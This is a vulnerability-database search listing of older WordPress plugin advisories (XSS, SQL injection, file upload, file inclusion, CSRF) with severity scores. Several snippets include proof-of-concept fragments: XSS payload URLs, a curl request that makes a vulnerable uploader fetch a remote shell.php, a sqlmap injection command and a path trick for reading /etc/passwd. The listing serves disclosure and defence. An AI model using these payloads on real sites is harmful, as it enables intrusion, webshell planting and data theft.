Lucene search
K
WpvulndbMost viewed

14602 matches found

WPVulnDB
WPVulnDB
added 2017/05/31 12:0 a.m.21 views

eventr 1.02.2 - Blind SQL Injection

The eventr WordPress plugin was affected by a Blind SQL Injection security vulnerability...

7.5CVSS2.3AI score0.02475EPSS
Exploits2References2Affected Software1
WPVulnDB
WPVulnDB
added 2017/05/15 12:0 a.m.21 views

Ultimate Addons for Visual Composer <= 3.16.11 - Authenticated XSS, CSRF, RCE

The UltimateVCAddons WordPress plugin was affected by an Authenticated XSS, CSRF, RCE security vulnerability...

2.6AI score
Exploits0References2Affected Software1
WPVulnDB
WPVulnDB
added 2017/04/26 12:0 a.m.21 views

flickr-picture-backup <= 0.7 - Unauthenticated File Upload

The flickr-picture-backup WordPress plugin was affected by an Unauthenticated File Upload security vulnerability...

7.5CVSS2.6AI score0.02558EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
added 2017/03/10 12:0 a.m.21 views

WP Markdown Editor 2.3.0 - Authenticated "Self" Cross-Site Scripting (XSS)

An Author user could be exploited by use of "self" XSS. This usually requires social engineering and user interaction...

2.8AI score
Exploits0Affected Software1
WPVulnDB
WPVulnDB
added 2017/03/06 12:0 a.m.21 views

mobile-friendly-app-builder-by-easytouch 3.0 - Unauthenticated File Upload

Plugin is still affected and has been closed...

7.5CVSS2.4AI score0.27448EPSS
Exploits4References3Affected Software1
WPVulnDB
WPVulnDB
added 2017/03/01 12:0 a.m.21 views

Magic Fields <= 1.7.1 - Authenticated Cross-Site Scripting (XSS)

The magic-fields WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability...

4.3CVSS1.8AI score0.01159EPSS
Exploits3References3Affected Software1
WPVulnDB
WPVulnDB
added 2017/02/10 12:0 a.m.21 views

WP Mail < 1.2 - XSS

The WP Mail WordPress plugin was affected by a XSS security vulnerability...

4.3CVSS2.1AI score0.00957EPSS
Exploits1References2Affected Software1
WPVulnDB
WPVulnDB
added 2016/11/08 12:0 a.m.21 views

WassUp Real Time Analytics <= 1.9 - Cross Site Scripting

The WassUp Real Time Analytics WordPress plugin was affected by a Cross Site Scripting security vulnerability...

4.3CVSS1.6AI score0.00923EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2016/08/03 12:0 a.m.21 views

Activity Log <= 2.3.2 - Cross-Site Scripting (XSS)

The Activity Log WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability...

4.3CVSS2.2AI score0.01034EPSS
Exploits0References2Affected Software1
WPVulnDB
WPVulnDB
added 2016/08/02 12:0 a.m.21 views

Yoast SEO <= 3.4.0 - Authenticated Stored Cross-Site Scripting (XSS)

The changelog reads: "Fixes a stored XSS issue in the Yoast SEO metabox. Thanks Hammad Shamsi for reporting and responsibly disclosing this issue."...

0.4AI score0.01115EPSS
Exploits1References2Affected Software1
WPVulnDB
WPVulnDB
added 2016/07/27 12:0 a.m.21 views

WP Google Map Plugin < 3.1.2 - XSS

The WP Google Map Plugin WordPress plugin was affected by a XSS security vulnerability...

4.3CVSS2.3AI score0.00978EPSS
Exploits0Affected Software1
WPVulnDB
WPVulnDB
added 2016/07/13 12:0 a.m.21 views

Profile Builder < 2.4.2 - Reflected Cross-Site Scripting (XSS)

The User Registration & User Profile – Profile Builder WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability...

4.3CVSS1.8AI score0.00913EPSS
Exploits0References3Affected Software1
WPVulnDB
WPVulnDB
added 2016/07/11 12:0 a.m.21 views

Activity Log <= 2.3.1 - Stored Cross-Site Scripting (XSS)

The Activity Log WordPress plugin was affected by a Stored Cross-Site Scripting XSS security vulnerability...

4.3CVSS2.2AI score0.01111EPSS
Exploits0References3Affected Software1
WPVulnDB
WPVulnDB
added 2016/07/11 12:0 a.m.21 views

WP Live Chat Support < 6.2.02 - Stored Cross-Site Scripting

The 3CX Live Chat WordPress plugin was affected by a Stored Cross-Site Scripting security vulnerability...

4.3CVSS1.2AI score0.0093EPSS
Exploits0References2Affected Software1
WPVulnDB
WPVulnDB
added 2016/05/26 12:0 a.m.21 views

Jetpack 2.0-4.0.2 - Shortcode Stored Cross-Site Scripting (XSS)

The Jetpack – WP Security, Backup, Speed, & Growth WordPress plugin was affected by a Shortcode Stored Cross-Site Scripting XSS security vulnerability...

4.3CVSS1.2AI score0.00961EPSS
Exploits0References3Affected Software1
WPVulnDB
WPVulnDB
added 2016/05/20 12:0 a.m.21 views

brafton WordPress Plugin <=3.4.7 - Reflected XSS

Title -brafton WordPress Plugin XSS Exploit Title : Vulnerabilitie XSS in brafton WordPress Plugin Date: Fri May 20 2016 Reported Date : Fri May 20 2016 Vendor Homepage: http://www.brafton.com/support/wordpress/ Version: v3.3.10 – January2016 Software Link:...

4.3CVSS6.2AI score0.0197EPSS
Exploits2References5Affected Software1
WPVulnDB
WPVulnDB
added 2016/05/11 12:0 a.m.21 views

Tera Charts 1.0 - Unauthenticated Cross-Site Scripting (XSS)

The tera-charts WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. PoC http://www.example.com/tera-charts/charts/treemap.php?fn=";alert1;...

4.3CVSS0.6AI score0.02177EPSS
Exploits2References2Affected Software1
WPVulnDB
WPVulnDB
added 2016/05/02 12:0 a.m.21 views

Ghost Plugin <= 0.5.5 - Unrestricted Export Download

The Ghost WordPress plugin was affected by an Unrestricted Export Download security vulnerability...

4CVSS2.5AI score0.01518EPSS
Exploits1References2Affected Software1
WPVulnDB
WPVulnDB
added 2016/04/29 12:0 a.m.21 views

Truemag Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)

The truemag WordPress theme was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. PoC http://WP/?s="%20...

4.3CVSS0.4AI score0.01252EPSS
Exploits2References3Affected Software1
WPVulnDB
WPVulnDB
added 2016/04/21 12:0 a.m.21 views

Tweet Wheel <= 1.0.3.2 - Reflected Cross-Site Scripting (XSS)

The Tweet Wheel WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability...

4.3CVSS1.2AI score0.01365EPSS
Exploits1References2Affected Software1
WPVulnDB
WPVulnDB
added 2016/04/12 12:0 a.m.21 views

HDW WordPress Video Gallery <= 1.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The hdw-tube WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. PoC http://www.example.com/wp-content/plugins/hdw-tube/playlist.php?playlist=""...

4.3CVSS0.7AI score0.0465EPSS
Exploits3References3Affected Software1
WPVulnDB
WPVulnDB
added 2016/04/12 12:0 a.m.21 views

Hero Maps Pro <= 2.1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The hero-maps-pro WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. PoC http://www.example.com/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=""...

4.3CVSS0.6AI score0.04448EPSS
Exploits2References2Affected Software1
WPVulnDB
WPVulnDB
added 2016/04/12 12:0 a.m.21 views

anti-plagiarism <= 3.60 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The anti-plagiarism WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. PoC http://www.example.com/wp-content/plugins/anti-plagiarism/js.php?m=""...

4.3CVSS0.6AI score0.04195EPSS
Exploits2References2Affected Software1
WPVulnDB
WPVulnDB
added 2016/03/22 12:0 a.m.21 views

OptinMonster <= 1.1.4.5 - Execution of Arbitrary Shortcodes

Unauthenticated users are able to execute arbitrary WordPress shortcodes via a simple HTTP GET request. While the command is protected by a nonce, the nonce is leaked on every page load...

5CVSS4.6AI score0.01092EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2015/12/02 12:0 a.m.21 views

Users Ultra Membership Plugin <= 1.5.63 - Authenticated Blind SQL Injection

The Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability...

6.5CVSS9.2AI score0.01735EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2015/11/17 12:0 a.m.21 views

Users Ultra Membership Plugin <= 1.5.58 - Unrestricted File Upload

The Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin WordPress plugin was affected by an Unrestricted File Upload security vulnerability...

6.8CVSS3.2AI score0.01965EPSS
Exploits0References1Affected Software1
WPVulnDB
WPVulnDB
added 2015/10/05 12:0 a.m.21 views

ResAds <= 1.0.1 - Reflected Cross-Site Scripting (XSS)

The ResAds WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability...

4.3CVSS1.4AI score0.01517EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2015/09/26 12:0 a.m.21 views

Appointment Booking Calendar < 1.1.8 - Multiple Reflected Cross-Site Scripting (XSS) and SQL Injection

The Appointment Booking Calendar WordPress plugin was affected by a Multiple Reflected Cross-Site Scripting XSS and SQL Injection security vulnerability...

7.5CVSS1.8AI score0.02433EPSS
Exploits3References1Affected Software1
WPVulnDB
WPVulnDB
added 2015/09/14 12:0 a.m.21 views

Csv2WPeC Coupon <= 1.1 - Unauthenticated Remote File Upload

The code in csv2wpecCouponFileUpload.php does not properly sanitize user input, it checks the file mime-type for type x-php but this can be tricked when using the short code for PoC "; $uploadfile="/var/www/s.pht"; $ch =...

5CVSS0.2AI score0.02043EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2015/08/25 12:0 a.m.21 views

Simple Fields <= 1.4.10 - Authenticated Reflected Cross-Site Scripting (XSS)

The Simple Fields WordPress plugin was affected by an Authenticated Reflected Cross-Site Scripting XSS security vulnerability...

4.3CVSS2AI score0.00951EPSS
Exploits0References2Affected Software1
WPVulnDB
WPVulnDB
added 2015/08/20 12:0 a.m.21 views

Alpine PhotoTile for Instagram <= 1.2.7.5 - Authenticated Cross-Site Scripting (XSS)

The alpine-photo-tile-for-instagram WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability...

4.3CVSS1.6AI score0.00867EPSS
Exploits1References2Affected Software1
WPVulnDB
WPVulnDB
added 2015/07/25 12:0 a.m.21 views

Unite Gallery Lite <= 1.4.6 - CSRF & Authenticated SQL Injection

The Unite Gallery Lite WordPress plugin was affected by a CSRF & Authenticated SQL Injection security vulnerability...

6.8CVSS3.3AI score0.02425EPSS
Exploits3References4Affected Software1
WPVulnDB
WPVulnDB
added 2015/07/10 12:0 a.m.21 views

Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload

The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability. PoC $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url=http://sitewithshellstodl/shell.php Shell location is reported back t...

5CVSS0.2AI score0.02996EPSS
Exploits2References2Affected Software1
WPVulnDB
WPVulnDB
added 2015/07/05 12:0 a.m.21 views

WP e-Commerce Shop Styling <= 2.5 - Local File Inclusion

The code in ./wp-ecommerce-shop-styling/includes/download.php does not sanitise user input to prevent sensitive system files from being downloaded. You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with pat...

5CVSS0.1AI score0.24093EPSS
Exploits2References5Affected Software1
WPVulnDB
WPVulnDB
added 2015/06/29 12:0 a.m.21 views

Broken Link Checker <= 1.10.8 - Unauthenticated Stored XSS

Persistent Cross-Site Scripting XSS in wordpress-admin-panel enabled by not proper sanitised HTTP headers...

4.3CVSS0.2AI score0.01487EPSS
Exploits0Affected Software1
WPVulnDB
WPVulnDB
added 2015/06/18 12:0 a.m.21 views

Erident Custom Login & Dashboard 3.4-3.4.1 - Stored Cross-Site Scripting (XSS)

The Erident Custom Login and Dashboard plugin exposes a call to the updateoption method, when a specific POST field is posted to the plugins setting screen. No CSRF token is used, and as such if an Administrative user can be tricked into visiting a site with a malicious form, it is possible to...

6.8CVSS0.9AI score0.00674EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
added 2015/06/08 12:0 a.m.21 views

Easy2Map Photos <= 1.0.9 - SQL Injection

The code in Functions.php is vulnerable to SQL Injection because they are not parameterising or sanitising user input. PoC sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php' --data="mapID=11='+or+1%3D%3D1%3B=e2mimgsavemapname" --cookie=COOKIEHERE --level=5 --risk=3...

7.5CVSS2.5AI score0.02212EPSS
Exploits4References2Affected Software1
WPVulnDB
WPVulnDB
added 2015/05/26 12:0 a.m.21 views

Estrutura-Basica - Local File Download

The estrutura-basica WordPress theme was affected by a Local File Download security vulnerability...

5CVSS1.9AI score0.0366EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
added 2015/04/14 12:0 a.m.21 views

WP Symposium <= 15.1 - SQL Injection

The wp-symposium WordPress plugin was affected by a SQL Injection security vulnerability...

7.5CVSS7.3AI score0.04771EPSS
Exploits5References3Affected Software1
WPVulnDB
WPVulnDB
added 2015/03/31 12:0 a.m.21 views

All in One SEO Pack <= 2.2.5.1 - Information Disclosure

The Semper Fi All in One SEO Pack plugin before 2.2.6 for WordPress does not consider the presence of password protection during generation of the Meta Description field, which allows remote attackers to obtain sensitive information by reading HTML source code...

5CVSS3AI score0.03029EPSS
Exploits0References2Affected Software1
WPVulnDB
WPVulnDB
added 2015/02/11 12:0 a.m.21 views

Facebook (spider-facebook) <= 1.0.10 - Cross-Site Scripting (XSS)

The WDSocialWidgets WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability...

4.3CVSS2.3AI score0.01651EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
added 2015/02/11 12:0 a.m.21 views

EasyCart <= 3.0.15 - Unrestricted File Upload

In versions = 3.0.8 this can be exploited by authenticating as any WordPress user, and in versions 3.0.9 - 3.0.15 can be exploited by passing a valid password hash being used by any admin in the EasyCart user system...

6.5CVSS2.1AI score0.51617EPSS
Exploits7References4Affected Software1
WPVulnDB
WPVulnDB
added 2015/01/17 5:32 p.m.21 views

Pie Register <= 2.0.13 - Privilege escalation

The Pie Register – User Registration Forms. Invitation based registrations, Custom Login, Payments WordPress plugin was affected by a Privilege escalation security vulnerability...

5CVSS2.6AI score0.07797EPSS
Exploits4References1Affected Software1
WPVulnDB
WPVulnDB
added 2015/01/16 12:0 a.m.21 views

CM Download Manager < 2.0.7 - CSRF to Cross-Site Scripting

The lack of CSRF check and sanitisation could allow attackers to perform CSRF attacks against logged in administrators, and set a Cross-Site Scripting payload via addonstitle parameter in the CMDMadminsettings page...

6.8CVSS4.5AI score0.01533EPSS
Exploits2References2Affected Software1
WPVulnDB
WPVulnDB
added 2015/01/11 12:27 p.m.21 views

Our Team Showcase 1.2 - CSRF & XSS

The Our Team Showcase WordPress plugin was affected by a CSRF & XSS security vulnerability...

6.8CVSS2.4AI score0.01001EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
added 2014/12/15 12:0 a.m.21 views

O2tweet <= 0.0.4 - Multiple CSRF

Plugin is still affected and has been closed...

6.8CVSS2.3AI score0.01001EPSS
Exploits2References1Affected Software1
WPVulnDB
WPVulnDB
added 2014/12/12 12:0 a.m.21 views

Cardoza Facebook Like Box < 2.8.3 - Multiple CSRF

The Easy Social Like Box – Popup – Sidebar Widget WordPress plugin was affected by a Multiple CSRF security vulnerability...

6.8CVSS2.7AI score0.0117EPSS
Exploits1References1Affected Software1
WPVulnDB
WPVulnDB
added 2014/12/12 12:0 a.m.21 views

Simple Ip Ban <= 1.2.3 - Multiple CSRF

The IP Ban WordPress plugin was affected by a Multiple CSRF security vulnerability...

6.8CVSS2.3AI score0.0117EPSS
Exploits1References2Affected Software1
WPVulnDB
WPVulnDB
added 2014/12/12 12:0 a.m.21 views

Simple Visitor Stat <= 1.0 - Multiple XSS

Plugin is still affected and has been closed...

4.3CVSS2.3AI score0.01633EPSS
Exploits1References2Affected Software1
WPVulnDB
WPVulnDB
added 2014/12/02 12:0 a.m.21 views

Ninja Forms <= 2.8.9 - Unspecified Issue Affecting Admin Users

This version includes a fix for a potential security vulnerability for admin users...

7.5CVSS4.1AI score0.02017EPSS
Exploits0References2Affected Software1
Total number of security vulnerabilities5000